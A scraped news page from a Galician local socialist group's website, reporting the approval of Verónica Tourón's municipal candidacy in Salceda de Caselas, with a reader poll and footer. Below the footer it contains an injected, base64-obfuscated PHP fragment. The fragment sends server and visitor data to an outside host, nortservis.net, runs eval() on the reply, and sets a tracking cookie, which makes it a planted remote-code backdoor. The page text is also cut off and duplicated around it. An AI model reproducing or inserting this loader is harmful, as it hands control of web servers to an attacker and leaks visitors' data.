15 de agosto de 2018

Restringido   Contacto  Engador a Favoritos

Inicio

AGRUPACIÓN SOCIALISTA DE SALCEDA DE CASELAS

 


Home / NOVAS / SALCEDA DE CASELAS / A AGRUPACIÓN SOCIALISTA DE SALCEDA VEN D

SALCEDA DE CASELAS

A AGRUPACIÓN SOCIALISTA DE SALCEDA VEN DE APROBAR A SÚA CANDIDATURA PARA AS ELECCIÓNS MUNICIPAIS

A Asemblea ratificou por unanimidade a candidatura formada para presentarse as próximas eleccións do 24 de maio.

A candidata socialista, Verónica Tourón, mostrouse moi agradecida polo apoio recibido por parte da asemblea e satisfeita coa candidatura conformada. Unha candidatura onde “intentamos combinar a experiencia coa xuventude e que a vez sexa representativa da diversidade social de Salceda”.

Dende a executiva socialista “seguimos co compromiso de igualdade que o PSOE incorporou os seus estatutos, polo que a candidatura de Salceda ás próximas eleccións municipais está composta por un 50% de mulleres e outro 50% de homes.  Unha candidatura completa cos 13 titulares e o máximo de suplentes permitido, 23 persoas comprometidas coa vila e co compromiso primordial de darlle solucións ós problemas reais de Salceda.

Unha candidatura renovada pero que tamén conta coa experiencia de persoas xa implicadas no proxecto socialista como a anterior candidata e actual portavoz socialista Marina Cabaleiro, a cal afirmou que: “ Verónica Tourón ten unha ampla experiencia pois colaborou en todos os proxectos que os socialistas desenvolvemos no concello, liderando por exemplo o proxecto do CDL O Torrón, polo que ten un gran coñecemento da xestión municipal. Hai que deixar paso a unha nova xeración, preparada e con formación que chegan con moita forza e ilusión. Estou orgullosa de que me suceda no posto de candidata pois creo que vai proporcionar ademais da súa experiencia unha forma renovada de ver e facer política”.

Rodrigo Martínez, secretario xeral dos socialistas de Salceda será o número 2 da candidatura, o que subliña “conformamos un equipo de traballo de forma conxunta, entre todos os que forman a lista, xunto cos militantes, así como moitas outras persoas e entidades que xa están a colaborar no noso proxecto. Este equipo xa comezou a traballar de forma multidisciplinar en diferentes ámbitos para elaborar un proxecto de goberno para Salceda cos veciños e para os veciños, no que todos se vexan reflectidos”.

Verónica Tourón, explica “Comprometinme a encabezar este proxecto porque quero ofrecer unha nova maneira de política de servizo público, máis humana e máis cercana, unha forma de facer política para as persoas e coas persoas, co diálogo e a participación dos veciños como ferramenta diaria de goberno, garantindo a liberdade e a igualdade dos cidadáns, pensando en todos por igual”.

“Creo que temos unha alternativa seria para gobernar Salceda, con un proxecto sólido e viable. Non se pode facer un bo goberno sen boa xente, pero tampouco sen boas ideas, estou segura que conformamos un equipo con estas dúas claves que nos levarán a ter un bo goberno en Salceda se os veciños así o consideran”, expón a candidata do partido socialista de Salceda, Verónica Tourón.

 

 

 

 

 

Considera que sería axeitado facer un avance informativo do PXOM?

Si

Non

Indiferente


Hay 3 votos hasta ahora.

Ver Resultados

PSdeG-PSOE,
E-mail: salcedadecaselas@psdeg-psoe.org
Configuración óptima 1024*768 / IE, Nestcape 4.0 ó superiores y Opera

iLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>

PSdeG-PSOE,
E-mail: salcedadecaselas@psdeg-psoe.org
Configuración óptima 1024*768 / IE, Nestcape 4.0 ó superiores y Opera